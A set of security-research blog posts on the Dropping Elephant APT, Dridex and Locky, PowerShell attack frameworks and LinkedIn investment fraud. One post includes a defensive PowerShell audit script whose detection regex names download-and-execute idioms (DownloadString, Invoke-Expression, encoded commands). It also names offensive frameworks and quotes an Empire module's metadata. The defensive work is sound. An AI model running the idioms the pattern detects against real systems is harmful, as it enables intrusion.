Not sure about doing business with these guys just yet; I'll consider my options.

Patchwork & The Dropping Elephant APT

Good work from Gadi and the team at Cymmetria, and from Kaspersky. The Cymmetria report is here, Kaspersky's is here.

What struck me as odd, and reminded me of some of the work I looked at in May, was this line in the Kaspersky analysis:

it hides base64 encoded and encrypted control server locations in comments on legitimate web sites. However, unlike the previous actors, the encrypted data provides information about the next hop, or the true C2 for the backdoor, instead of initial commands.
— https://securelist.com/blog/research/75328/the-dropping-elephant-actor/

This particular comment struck me because in early May I was analysing some malicious .pps documents I had received and identified a number of CVEs being used in them; they contained material related to government projects and political interests in SE Asia.

Example metadata from a .pps leveraging CVEs

I was struggling to identify what type of campaign this was when I found that some of the C2 commands were being stored in blog comments on legitimate websites, although those sites were completely unrelated to any political activity.



There is a lot of security research available on the political unrest in SE Asia and the South China Sea. Much of the groundwork has been laid by FireEye; the ongoing territorial disputes are being fought with a very competitive cyber theme.

Welcome back #Dridex

My most recent blog suggested we would see the back of Dridex & Locky; in hindsight that was a bit hopeful. P2P botnets do not die: the very principle they are built on offers a level of persistence that makes them near on impossible to remove.

It has 'returned' - hat tip to @malwaretech, who has significant fingers in pies with Necurs and can identify a lot of what Dridex is doing. I'm time-limited in terms of RE at the moment, but thankfully the changes in Dridex are being identified by Matt Mesa at Proofpoint.


What I have identified as a result of some recent changes is OS fingerprinting, which is new (to me at least): Dridex is actively identifying the OS running on the host.


So the question to me is: why is Dridex looking to fingerprint the OS? I observed some interesting checks in the macro too, including the number of documents opened previously (attempted sandbox evasion, I assume), but this is easily bypassed.

Goodbye #Dridex, good riddance #Locky

The Past

We will no doubt shortly see some official word on the 'takedown' of Dridex and/or Locky; it has been widely reported that the lack of daily spam campaigns indicates its disappearance is linked to the FSB operation. It's widely known that the FSB only get involved in cyber criminal activity when there is significant international pressure to investigate.

It's difficult not to draw logical conclusions from the timings of the two operations and the subsequent disappearance of Dridex/Locky, but it's unlikely that Russia would be directly involved in a 'takedown' operation of a significant botnet which was responsible for the theft of money from banking institutions.

During the period from mid-2015 to the present day, 18 targeted attacks have been recorded across the country at bank customers’ automated workstations. The damage caused has exceeded 3 billion rubles. The police have prevented potential damage in the amount of 2 billion 273 million rubles.
— https://xn--80agyg.xn--b1aew.xn--p1ai/news/item/7894434/

The FSB & MIA worked with Sberbank to conduct this operation, and the reports from Russian intelligence indicate around 2.2 billion rubles were lost between October 2015 and March 2016, which ironically is the same time as the arrest of Smilex, who at the time was in Cyprus and is originally from Moldova.

The Present

  • Vawtrak/Hancitor/H1N1
  • Vawtrak = Banking Trojan AKA Neverquest
  • Hancitor = Dropper, usually delivered by a macro
  • H1N1 = Loader, with UAC bypass (with some additional checks for GetCurrentProcess, and a nice crash) - Thanks to the geniuses on KernelMode

Identifying Hancitor was done post-infection in my lab. Thanks to Matt as ever.

Really great overview here from Proofpoint, and a sample here.

#Powershell - The enemy you are already losing the battle against

PowerShell, and the attacks it is capable of, is not a new concept. The number of publicly available frameworks is growing exponentially. It's a trusted method of attack and one that is gaining more and more focus from those capable of leveraging its power.

Why should you fear PowerShell leveraged attacks? Well, for a number of reasons:

  1. It's probably present on every single machine in your enterprise.
  2. It's a native tool, which is difficult to detect if used in an attack.
  3. It leaves very, very little in terms of forensic evidence on the endpoint, or when moving laterally across a network.
  4. Malware is already using it during attacks.
  5. The namespaces it's capable of 'plugging' into are terrifying:

https://msdn.microsoft.com/en-us/library/system.directoryservices.activedirectory(v=vs.110).aspx

There are probably 10 more reasons to worry about PowerShell; these are just the ones I'm familiar with.

I first began using PowerShell to perform very mundane tasks that should be automated, such as the creation and deletion of user accounts. I then found out that Microsoft was releasing a version of Windows which was command line only, with no GUI. This effectively means you can manage it via the command line and, subsequently, remotely. This did exist before, but the functionality available in R2 was far greater than it had been.


No. There is nobody here.


Server Core, the version which I began to use in place of the full-blown GUI version, was easy: I was able to configure Windows Remote Management (WinRM) using sconfig. I then began to use PowerShell in a way which made me understand just how powerful it was. I'm no script ninja, but I am able to write scripts which help me do work in a faster, more agile way.

Then I discovered Get-WmiObject. I realised I was able to use WMI classes, which as far as I remember was the single most dangerous thing I'd seen on a network, barring physical access to a comms room. Why? Well, WMI is essentially a remote management framework: you can do the worst thing possible on an endpoint, execute code. I hope this sufficiently conveys its capability.
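As an added example, not from the original post or from any of the projects mentioned, here is a defender's audit in PowerShell of the points above: whether script block, module, transcription and command-line logging are switched on (the policy keys and event IDs are Microsoft's), whether WinRM and WMI are exposing remote execution on the host, and a quick hunt over recent 4104 events for the encoded/download patterns the frameworks rely on. The function names and the regex are my own.

```powershell
# Added example, not from the original post. Run as local admin on the host you want
# to check. Policy key paths and event IDs are Microsoft's; everything else is mine.
$policies = @(
    @{ Name  = 'Script block logging (event 4104)'
       Path  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
       Value = 'EnableScriptBlockLogging' },
    @{ Name  = 'Module logging (event 4103)'
       Path  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'
       Value = 'EnableModuleLogging' },
    @{ Name  = 'Transcription to disk'
       Path  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
       Value = 'EnableTranscripting' },
    @{ Name  = 'Process creation includes command line (event 4688)'
       Path  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
       Value = 'ProcessCreationIncludeCmdLine_Enabled' }
)

function Get-LoggingPosture {
    # A missing key or value means the policy is not set, i.e. that evidence is not kept.
    foreach ($p in $policies) {
        $enabled = $false
        if (Test-Path $p.Path) {
            $v = Get-ItemProperty -Path $p.Path -ErrorAction SilentlyContinue
            if ($null -ne $v -and $v.PSObject.Properties[$p.Value] -and $v.($p.Value) -eq 1) {
                $enabled = $true
            }
        }
        [pscustomobject]@{ Control = $p.Name; Enabled = $enabled }
    }
}

function Get-RemoteExecSurface {
    # WinRM listeners carry remote PowerShell; the Winmgmt service carries Get-WmiObject
    # and friends. Both running with no logging above is the worst combination.
    $winrm = Get-Service WinRM   -ErrorAction SilentlyContinue
    $wmi   = Get-Service Winmgmt -ErrorAction SilentlyContinue
    $listeners = @()
    if ($winrm -and $winrm.Status -eq 'Running') {
        $listeners = @(Get-ChildItem WSMan:\localhost\Listener -ErrorAction SilentlyContinue)
    }
    [pscustomobject]@{
        WinRMRunning  = [bool]($winrm -and $winrm.Status -eq 'Running')
        ListenerCount = $listeners.Count
        WmiRunning    = [bool]($wmi -and $wmi.Status -eq 'Running')
    }
}

function Get-SuspiciousScriptBlocks {
    # 4104 events hold the de-obfuscated script text, so a simple pattern match over them
    # catches the encoded/downloader idioms. Returns nothing if the log is off or empty.
    param([int]$Max = 20)
    $pattern = 'FromBase64String|-EncodedCommand|DownloadString|Invoke-Expression|\bIEX\b'
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents 500 -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match $pattern } |
        Select-Object -First $Max TimeCreated, Message
}

Get-LoggingPosture | Format-Table -AutoSize
Get-RemoteExecSurface
Get-SuspiciousScriptBlocks
```

A host where every control reports False and WinRM is listening is exactly the one reason 3 above describes; turning the four policies on is the cheapest fix.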

Further to this, a lot of very smart people are already doing fantastic work in this space. In no particular order, I would recommend following them and keeping a very close eye on their work:

  • Matt Graeber - https://twitter.com/mattifestation
  • Will - https://twitter.com/harmj0y
  • Sean Metcalf - https://twitter.com/PyroTek3
  • Chris Campbell (great surname, by the way) - https://twitter.com/obscuresec

Some of the frameworks currently undergoing continued development:

  • http://www.powershellempire.com/
  • https://github.com/PowerShellMafia/PowerSploit
  • https://github.com/samratashok/nishang

Sean presented probably the most important talk on Active Directory attacks in a very long time, and thankfully on the ability to detect them, at Black Hat 2015. Slides here; I have watched this video more times than I can remember. The stats included from this are from the DBR 2015.



''It's way too easy to get someone to click on a link'' - Sean Metcalf, 2015

If you need to defend against these kinds of attacks, the work done by Sean is available here.

Recommended reading

  • https://www.nsa.gov/ia/_files/app/spotting_the_adversary_with_windows_event_log_monitoring.pdf
  • https://mva.microsoft.com/en-US/training-courses/using-powershell-for-active-directory-8397
  • https://technet.microsoft.com/en-gb/library/cc995228.aspx

Some very public breaches have contained links to the potential usage of these tools, if you still needed convincing.



The hackers behind the attack on infidelity website Ashley Madison alerted staff to the breach by setting their laptops to play AC/DC song 'Thunderstruck'.

The following is a code snippet available from PowerShell Empire:

import base64
from lib.common import helpers   # Empire's own helper module; only resolves inside the Empire tree

class Module:

    def __init__(self, mainMenu, params=[]):

        # Module metadata as Empire's menu displays it
        self.info = {
            'Name': 'Invoke-Thunderstruck',
            'Author': ['@obscuresec'],
            'Description': ("Play's a hidden version of AC/DC's Thunderstruck video while "
                            "maxing out a computer's volume."),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : False,
            'MinPSVersion' : '2',
            'Comments': [
                'https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot'
            ]
        }

It may be completely unrelated, but it's an interesting thought to link the two together...

Thanks to all those named above for the work they are doing in this area.

Please add me to your #Linkedin sockpuppet network!

LinkedIn has approximately 414m active users, a portion of which are completely fake. This practice has been observed in the past, with fake recruiters targeting researchers.

This content is the result of the same 'gang' of Nigerian criminals who favour KeyBase to steal sensitive credentials. I've observed these gangs (along with @techhelplist, who finds a lot of the details included here) using LinkedIn as a new platform for attempted financial fraud.

A large number of the screenshots shared with me are the result of a misconfigured KeyBase panel: there is a well-known bug in KeyBase which allows unauthenticated access to the /images/ directory to anyone who knows how to locate it. Palo Alto have listed a large number here.

A number of determined sock puppets are using LinkedIn as a means of defrauding a significant number of businesses in the following countries:

  • UAE
  • US
  • UK

Figures are derived from the companies targeted in the panel images.

The sectors targeted include Real Estate, Investment & Law. This kind of fraud is complex in the sense that it requires geographically dispersed criminals to 'link up' to be successful. The fraud is highly likely committed from Nigeria (thanks to @techhelplist again, who helped ID the content and the fraud gang). The concept is simple: offering investment or seeking investment, depending on the potential victim.

The belief that this fraudulent operation is from Nigeria is based on the evidence provided, which included active Facebook content and helpful photographs of places of work and friends associated with the gang.

The image below is taken from a panel and shows our 'guy' logged into a LinkedIn profile, with a large number of messages all with the same content.

Seeking investment or offering investment.

@malwarehunterteam do a great job of supplying a large number of samples of various malware. iSpy came to my attention recently, and its codebase is almost identical to KeyBase, with both employing the same stealing functions. I will post a more detailed article on iSpy when I get time.

Reconnaissance message

We offer secured loand or funds to individuals and companies at low interest rates. we offer long and short terms loans or funding of any projects. Our firm has a recored a lot of breakthroughs in the provision of first-class financial services to our clients.
— Akeem

The message above is pretty static and appears to be sent to a large number of potential victims. The method of communication varies across email providers. If you believe you've been approached by this gang, or have been part of the attempted fraud process, please contact me; I can share a number of verified IOCs.

The image below is a capture from the /images/ directory which includes a conversation with the 'master', who shares the devices used to perform the initial reconnaissance. Pg.5 of this alludes to the hierarchy involved.

In summary, this concept of attempted fraud via social networks should sufficiently deliver the message that nobody is who you believe they are, particularly when dealing with financial transactions.

FireEye produced a research article on the thriving economy of 'scammers' operating out of Nigeria. Pg.11 is of interest in the context of the content here.

The scammers use a variety of tools for distributing these exploits and keyloggers, such as email extractors, email notifiers, bulk mailing providers, and VPN/proxy providers. The email extractors help scammers scrape email addresses of potential targets from various sites which are fed to bulk mailing applications. They use proxy providers as a precaution when logging into their victims’ accounts to hide their IP addresses. They also use email notifiers to monitor incoming emails.
— https://www2.fireeye.com/rs/848-DID-242/images/rpt_nigerian-scammers.pdf

'Trust, but verify' is a mantra that I preach. It's disappointing that LinkedIn does not have any method of formal verification for its users. There is no PGP or Keybase.io input required; even most DNMs require some form of ID verification!

@thegrugq makes the point far more eloquently than I ever could. In short, the game of cyber security has changed, and the context in which you operate, or call your working environment, is someone else's lunch.

Full slides here